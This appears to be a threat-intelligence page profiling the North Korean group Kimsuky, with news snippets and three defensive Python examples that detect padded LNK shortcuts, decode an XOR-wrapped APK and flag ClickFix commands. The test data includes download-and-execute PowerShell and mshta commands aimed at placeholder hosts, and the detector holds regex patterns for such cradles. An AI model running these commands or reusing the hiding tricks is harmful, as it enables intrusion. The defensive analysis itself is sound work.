Kimsuky

Kimsuky, also tracked as Velvet Chollima and Black Banshee, is a North Korean state-backed espionage group active since at least 2012. It initially targeted South Korean government entities, think tanks, and individuals identified as subject-matter experts, and later broadened its target set to South Korean industry, nuclear power operators, and the Ministry of Unification. In recent years Kimsuky has extended its operations to targets in Russia, the United States, and European nations. Its collection priorities are foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions. Notable campaigns attributed to the group include the 2014 Korea Hydro & Nuclear Power Co. compromise, Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019). Kimsuky is also thought to be behind a wave of attacks aimed at stealing victims' personal information, account IDs and passwords, and cryptocurrency.

Cyber News related to Kimsuky

Kimsuky APT Targets South Korean Androids, Abuses KakaoTalk for Espionage - The Kimsuky advanced persistent threat (APT) group has been actively targeting South Korean Android users by abusing the popular messaging app KakaoTalk to conduct espionage activities. This campaign highlights the evolving tactics of Kimsuky, ...
1 month ago Darkreading.com Kimsuky
Kimsuky HTTPtroy Backdoor Targets South Korea Users - The Kimsuky threat group has deployed a new HTTPtroy backdoor targeting users in South Korea, highlighting a sophisticated cyber espionage campaign. This malware enables attackers to maintain persistent access and exfiltrate sensitive data from ...
2 months ago Darkreading.com Kimsuky
Kimsuky and Lazarus Hacker Groups Unveil New Tools - The notorious North Korean hacker groups Kimsuky and Lazarus have recently unveiled new cyber tools, escalating their threat capabilities in the global cybersecurity landscape. These groups, known for their sophisticated cyber espionage and ...
2 months ago Cybersecuritynews.com CVE-2023-28252 CVE-2023-4863 Kimsuky Lazarus
Kimsuky Hackers Deploy Weaponized LNK File in Latest Espionage Campaign - Kimsuky, a notorious North Korean hacker group, has been observed deploying a weaponized LNK file in their latest cyber espionage campaign. This attack vector leverages malicious shortcut files to execute payloads stealthily on targeted systems, ...
3 months ago Cybersecuritynews.com Kimsuky
Exposed Kim Dump Exposes Kimsuky Hackers - The recent leak known as the "Exposed Kim Dump" has unveiled critical insights into the operations of the Kimsuky hacker group, a notorious North Korean cyber espionage entity. This dump includes a wealth of data that sheds light on Kimsuky's ...
3 months ago Cybersecuritynews.com Kimsuky
Kimsuky Hackers Using ClickFix Technique to Execute Malicious Scripts on Victim Machines - The attackers impersonate legitimate entities, including government officials, news correspondents, and security personnel, to establish trust before delivering malicious payloads through encrypted archives or deceptive websites designed to mimic ...
6 months ago Cybersecuritynews.com Kimsuky
ClickFix Attack Emerges by Over 500% - Hackers Actively Using This Technique to Trick Users - The attack presents victims with fake error messages or verification prompts that appear legitimate, instructing them to copy and paste seemingly harmless commands to resolve fictitious technical issues. Unlike traditional attack methods, ClickFix ...
6 months ago Cybersecuritynews.com Kimsuky Lazarus Group MuddyWater APT3
Lumma Stealer Evolves with New PowerShell Tools & Advanced Techniques - “The variations we saw in Lumma Stealer behavior are significant to defenders,” noted the Sophos Managed Detection and Response team in their report, emphasizing that these delivery techniques could easily be adapted for other malware ...
7 months ago Cybersecuritynews.com Kimsuky
Kimsuky Hacker Group Employs New Phishing Tactics & Malware Infections - The group, known for targeting government entities, think tanks, and individuals related to foreign policy and national security, has enhanced its technical capabilities with multi-stage attack chains designed to evade detection while extracting ...
7 months ago Cybersecuritynews.com Kimsuky
Kimsuky Hackers Exploiting RDP & MS Office Vulnerabilities in Targeted Attacks - A sophisticated Advanced Persistent Threat (APT) operation named Larva-24005, linked to the notorious Kimsuky threat group, has been discovered actively exploiting critical vulnerabilities in Remote Desktop Protocol (RDP) and Microsoft Office ...
8 months ago Cybersecuritynews.com Equation Kimsuky CVE-2019-0708
State-sponsored hackers embrace ClickFix social engineering tactic - Proofpoint reports that APT28, a GRU unit, also used ClickFix as early as October 2024, using phishing emails mimicking a Google Spreadsheet, a reCAPTCHA step, and PowerShell execution instructions conveyed via a pop-up. ClickFix attacks are gaining ...
8 months ago Bleepingcomputer.com APT28 Kimsuky MuddyWater
State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns - While currently limited to experimental usage by these state-sponsored groups, the increasing popularity of ClickFix in both cybercrime and espionage campaigns suggests the technique will likely become more widely adopted as threat actors continue to ...
8 months ago Cybersecuritynews.com Kimsuky MuddyWater
Lazarus Group is No Longer Considered a Single APT Group, But a Collection of Many Sub-Groups - The cybersecurity landscape is witnessing a growing complexity in the attribution of Advanced Persistent Threat (APT) actors, particularly the North Korean-linked Lazarus group. For instance, Bureau325 and APT43 have been identified as entities that ...
9 months ago Cybersecuritynews.com Kimsuky Lazarus Group
North Korean Kimsuky Hackers New Tactics & Malicious Scripts in Latest Attacks - The attack's initial payload consists of four files: a heavily obfuscated VBScript (1.vbs), a PowerShell script (1.ps1), and two encoded text files (1.log and 2.log) that contain the actual malware components. ...
9 months ago Cybersecuritynews.com Kimsuky
New Windows zero-day exploited by 11 state hacking groups since 2017 - The Windows zero-day, tracked as ZDI-CAN-25373, is caused by a User Interface (UI) Misrepresentation of Critical Information (CWE-451) weakness, which allows attackers to exploit how Windows displays shortcut (.lnk) files to evade detection and ...
9 months ago Bleepingcomputer.com Mustang Panda CVE-2024-43461 APT37 BITTER Kimsuky Sidewinder APT3
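The display weakness in the item above lets a shortcut show one thing in its properties dialog while launching another. The Python below is an added triage example, not code from the article or from any of the listed groups' tooling: it parses the shell-link header and StringData section as laid out in MS-SHLLINK and flags shortcuts whose COMMAND_LINE_ARGUMENTS field carries a long run of whitespace, which is the padding form of the trick that pushes the real command out of the visible "Target" box. The 64-character threshold and the build_lnk helper that fabricates test input are choices of this example, not values taken from the reports.

```python
import struct

# LinkFlags bits from the ShellLinkHeader (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# Whitespace a padding trick can use to push the real command off the visible Target field.
PAD_CHARS = set(" \t\r\n\x0b\x0c")


def parse_lnk(data: bytes) -> dict:
    """Parse the header, skip IDList/LinkInfo, and return the StringData fields."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid = struct.unpack_from("<I16s", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        id_list_size = struct.unpack_from("<H", data, pos)[0]   # size excludes the 2-byte field itself
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        link_info_size = struct.unpack_from("<I", data, pos)[0]  # size includes the 4-byte field
        pos += link_info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    # StringData entries appear in this fixed order, each as CountCharacters + chars.
    for name, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if unicode:
            fields[name] = data[pos:pos + count * 2].decode("utf-16-le")
            pos += count * 2
        else:
            fields[name] = data[pos:pos + count].decode("latin-1")
            pos += count
    return fields


def padding_length(arguments: str) -> int:
    """Length of the longest run of whitespace in the argument string."""
    best = run = 0
    for ch in arguments:
        run = run + 1 if ch in PAD_CHARS else 0
        best = max(best, run)
    return best


def is_suspicious(data: bytes, threshold: int = 64) -> bool:
    """True if COMMAND_LINE_ARGUMENTS holds a whitespace run long enough to hide what follows it."""
    args = parse_lnk(data).get("arguments", "")
    return padding_length(args) >= threshold


def build_lnk(arguments: str, relative_path: str = "cmd.exe") -> bytes:
    """Constructed test input: a minimal Unicode .lnk with only RELATIVE_PATH and arguments."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I16sI", header, 0, HEADER_SIZE, LNK_CLSID, flags)
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return bytes(header) + body


if __name__ == "__main__":
    padded = build_lnk("/c " + " " * 300 + "powershell -w hidden -nop -c whoami")
    print("padded shortcut suspicious:", is_suspicious(padded))
    print("benign shortcut suspicious:", is_suspicious(build_lnk("/c notepad.exe")))
```

Real samples usually carry an IDList and LinkInfo as well, which the parser skips by size rather than interpreting; the arguments string is the only field the check needs. A run of hundreds of spaces before a PowerShell or mshta invocation is a strong enough signal on its own to quarantine the file for a closer look.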
Beware of North Korean Hackers DocSwap Malware Disguised As Security Document Viewer - “The malicious app performs an XOR (0xCC) operation on the ‘security.db’ file in a subdirectory, which drops an APK file and loads the DEX file stored within it,” explained the report detailing the threat. A sophisticated ...
9 months ago Cybersecuritynews.com Kimsuky
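The single-byte XOR unwrapping quoted above is straightforward to reverse on a captured 'security.db'. The Python below is an added example, not the report's or the malware's own code: it infers the XOR key from the ZIP local-file-header magic that any APK must start with (the reported key is 0xCC), decodes the file, and confirms the result is a parsable archive carrying a classes.dex, the DEX the report says gets loaded. The sample 'security.db' is constructed inline and is not a real artifact.

```python
import io
import zipfile
from typing import Optional

XOR_KEY = 0xCC                  # key the report describes for security.db
ZIP_MAGIC = b"PK\x03\x04"       # every APK is a ZIP, so the plaintext starts with this


def xor_decode(blob: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR over the whole blob (XOR is its own inverse)."""
    return bytes(b ^ key for b in blob)


def guess_xor_key(blob: bytes) -> Optional[int]:
    """Recover a single-byte XOR key by assuming a ZIP local-file-header magic at offset 0."""
    if len(blob) < len(ZIP_MAGIC):
        return None
    key = blob[0] ^ ZIP_MAGIC[0]
    if all(blob[i] ^ key == ZIP_MAGIC[i] for i in range(len(ZIP_MAGIC))):
        return key
    return None


def looks_like_apk(blob: bytes) -> bool:
    """Require the ZIP magic, a parsable archive, and a classes.dex inside it."""
    if not blob.startswith(ZIP_MAGIC):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return "classes.dex" in zf.namelist()
    except zipfile.BadZipFile:
        return False


def recover_embedded_apk(db_bytes: bytes) -> Optional[bytes]:
    """Return the decoded APK if the file is a single-byte-XOR-wrapped APK, else None."""
    key = guess_xor_key(db_bytes)
    if key is None:
        return None
    decoded = xor_decode(db_bytes, key)
    return decoded if looks_like_apk(decoded) else None


def build_sample_db() -> bytes:
    """Constructed stand-in for security.db: a tiny APK-shaped ZIP XORed with 0xCC."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 32)  # DEX magic only, no real code
    return xor_decode(buf.getvalue(), XOR_KEY)


if __name__ == "__main__":
    sample = build_sample_db()
    print("guessed key:", hex(guess_xor_key(sample)))
    apk = recover_embedded_apk(sample)
    print("recovered APK bytes:", None if apk is None else len(apk))
```

Inferring the key from the expected magic instead of hard-coding 0xCC means the same routine keeps working if a later build rotates the key; the classes.dex check then rules out a coincidental four-byte match.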
Hackers Using Advanced Social Engineering Techniques With Phishing Attacks - ESET’s APT Activity Report shows that the North Korea-aligned threat actors have significantly refined their tactics, making traditional security advice like “don’t click suspicious links” increasingly inadequate as attacks ...
9 months ago Cybersecuritynews.com Kimsuky Lazarus Group
North Korean Hackers Using Dropbox & PowerShell Scripts To Infiltrate Organizations - Dubbed ‘DEEP#DRIVE’ by researchers at Securonix, the operation leverages phishing lures, obfuscated PowerShell scripts, and Dropbox’s infrastructure to bypass security defenses and exfiltrate sensitive data. A coordinated cyber ...
10 months ago Cybersecuritynews.com Kimsuky
North Korea's Kimsuky Attacks Rivals' Trusted Platforms - North Korea-linked threat groups are increasingly using living-off-the-land (LotL) techniques and trusted services to evade detection, with a recent Kimsuky campaign showcasing the use of PowerShell scripts and storing data in Dropbox folders, along ...
10 months ago Darkreading.com Andariel Kimsuky
DPRK hackers dupe targets into typing PowerShell commands as admin - Microsoft says it observed this tactic in limited-scope attacks starting January 2025, targeting individuals that work in international affairs organizations, NGOs, government agencies, and media companies across North America, South America, ...
10 months ago Bleepingcomputer.com Kimsuky
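Several items on this page (the ClickFix reports, the pasted PowerShell commands, and the run-as-admin variant Microsoft described above) share one observable: a scripting host started from the user's own shell with a download-and-execute command line, often with reassuring "verification" text appended so the Run box looks harmless. The Python below is an added detection sketch run over constructed Sysmon-style process-creation records; it is not from any vendor report. The field names, the choice of explorer.exe as the parent that represents the Win+R Run dialog, the indicator regexes, and the sample events are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    parent_image: str
    image: str
    command_line: str
    elevated: bool = False  # True if the new process holds an admin token


INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
USER_ENTRY_PARENTS = {"explorer.exe"}  # Run dialog and shell launches typed by the user

CRADLE = re.compile(
    r"(invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|downloadstring|downloadfile|"
    r"invoke-expression|\biex\b|mshta(\.exe)?\s+https?://)", re.I)
EVASION = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b|-noprofile\b|-enc(odedcommand)?\b)", re.I)
LURE = re.compile(r"(i am not a robot|human verification|captcha|ray id|verification id)", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_reasons(ev: ProcessEvent) -> List[str]:
    """Return the indicators that make this event look like a pasted ClickFix command, or []."""
    if basename(ev.image) not in INTERPRETERS or basename(ev.parent_image) not in USER_ENTRY_PARENTS:
        return []
    reasons = []
    if CRADLE.search(ev.command_line):
        reasons.append("download-and-execute cradle")
    if EVASION.search(ev.command_line):
        reasons.append("hidden/bypass interpreter switches")
    if LURE.search(ev.command_line):
        reasons.append("verification lure text in command line")
    if ev.elevated:
        reasons.append("runs elevated")
    # A cradle is enough on its own; evasion switches plus lure text is the other strong pairing.
    cradle = "download-and-execute cradle" in reasons
    evasion_and_lure = len(reasons) >= 2 and "verification lure text in command line" in reasons
    return reasons if (cradle or evasion_and_lure) else []


def triage(events: List[ProcessEvent]) -> List[Tuple[int, List[str]]]:
    """Index and reasons for every event that fires."""
    hits = []
    for i, ev in enumerate(events):
        reasons = clickfix_reasons(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry, not captured from a real incident.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -c "iwr https://example.invalid/v.txt | iex" '
                 '# I am not a robot - reCAPTCHA Verification ID: 7624', elevated=True),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c mshta https://example.invalid/verify.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", PS,
                 r"powershell -ep bypass -file C:\ProgramData\inv.ps1"),
]


if __name__ == "__main__":
    for idx, why in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(why)}")
```

The fourth sample is deliberately left unflagged: a scheduled or service-launched script with bypass switches deserves its own rule, but it is not the user-pasted pattern these reports describe. On a host without process telemetry, the text typed into Win+R also survives in the RunMRU key under HKCU, which is the first place to look when reconstructing what a user was talked into running.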
Andariel Hacking Group Shifts Focus to Financial Attacks on U.S. Organizations - In July 2024, a North Korean military intelligence operative part of the Andariel group was indicted by the U.S. Department of Justice (DoJ) for allegedly carrying out ransomware attacks against healthcare facilities in the country and using the ...
1 year ago Thehackernews.com Andariel Kimsuky
North Korea-linked APT Kimsuky targeted German defense firm Diehl Defence - North Korea-linked APT group Kimsuky has been linked to a cyberattack on Diehl Defence, a defense firm specializing in the production of advanced military systems. “Researchers from Mandiant, a Google subsidiary, uncovered and analyzed a ...
1 year ago Securityaffairs.com Kimsuky
Microsoft links North Korean hackers to new FakePenny ransomware - Microsoft has linked a North Korean hacking group it tracks as Moonstone Sleet to FakePenny ransomware attacks, which have led to millions of dollars in ransom demands. While this threat group's tactics, techniques, and procedures largely overlapped ...
1 year ago Bleepingcomputer.com Kimsuky Lazarus Group LockBit Ransomhub
North Korean Hacker Group Kimsuky Deploys New Linux Malware 'Gomir' via Trojanized Software Installers - Kimsuky, linked to North Korea's military intelligence, the Reconnaissance General Bureau, has a history of sophisticated cyber attacks aimed primarily at South Korean entities. In early February 2024, researchers at S2W, a threat intelligence ...
1 year ago Cysecurity.news Kimsuky